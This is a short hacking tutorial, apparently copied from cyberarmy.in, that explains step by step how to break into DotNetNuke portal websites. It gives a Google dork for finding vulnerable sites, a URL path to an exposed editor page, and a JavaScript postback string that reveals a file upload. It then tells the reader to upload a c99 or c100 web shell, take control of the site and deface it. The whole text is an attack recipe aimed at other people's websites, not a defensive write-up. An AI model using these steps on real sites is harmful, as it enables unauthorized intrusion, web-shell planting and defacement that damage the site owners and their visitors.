Portal hacking (DNN) – website hacking technique.
Portal hacking is a method of website hacking which uses Google dork and address-bar injection.
Step 1. Go to www.google.com
Step 2. Now enter this dork.
Inurl:/tabid/36/language/en-US/Default.aspx
This is the Google dork to find the portal vulnerable sites, use it wisely.
Step 3. You will find many sites, select the site which you are comfortable with.
Step 4. For example take this site.
Example:
Step 5. Now replace
/Home/tabid/36/Langauge/en-US/Default.aspx
With this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6. You will get a link gallery page. So far so good!
Step 7. Don’t do anything for now; wait for the next step…
Step 8. Now replace the URL in the address bar with a simple script.
Javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Step 9. You will find the upload option.
Step 10. Select Root.
Step 11. Upload your package your shell c99, c100 etc etc.
Step 12. Now you have total control over the website, deface it and have fun …
This article was extracted from www.cyberarmy.in
